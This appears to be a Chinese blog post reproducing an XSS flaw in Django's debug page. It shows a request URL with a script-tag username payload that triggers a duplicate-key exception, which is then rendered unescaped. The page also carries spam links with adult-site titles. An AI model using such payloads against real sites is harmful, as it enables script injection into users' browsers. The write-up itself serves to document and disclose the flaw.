Django debug page XSS漏洞（CVE-20

發布時間：2020-07-19 23:41:45 來源：網絡閱讀：613 作者：小武w 欄目：安全技術

漏洞復現：
1.創建個用戶：ip:8000/create_user/?username=<script>alert(7)</script>
Django debug page XSS漏洞（CVE-20
顯示用戶已創建。
2.觸發漏洞，再次訪問ip:8000/create_user/?username=<script>alert(7)</script>

3.觸發異常：duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
Django debug page XSS漏洞（CVE-20
4.這個異常被拼接進The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception，最后觸發XSS。

向AI問一下細節

中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

Django debug page XSS漏洞（CVE-20

猜你喜歡

中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

Django debug page XSS漏洞（CVE-20

猜你喜歡

最新資訊

相關推薦

相關標簽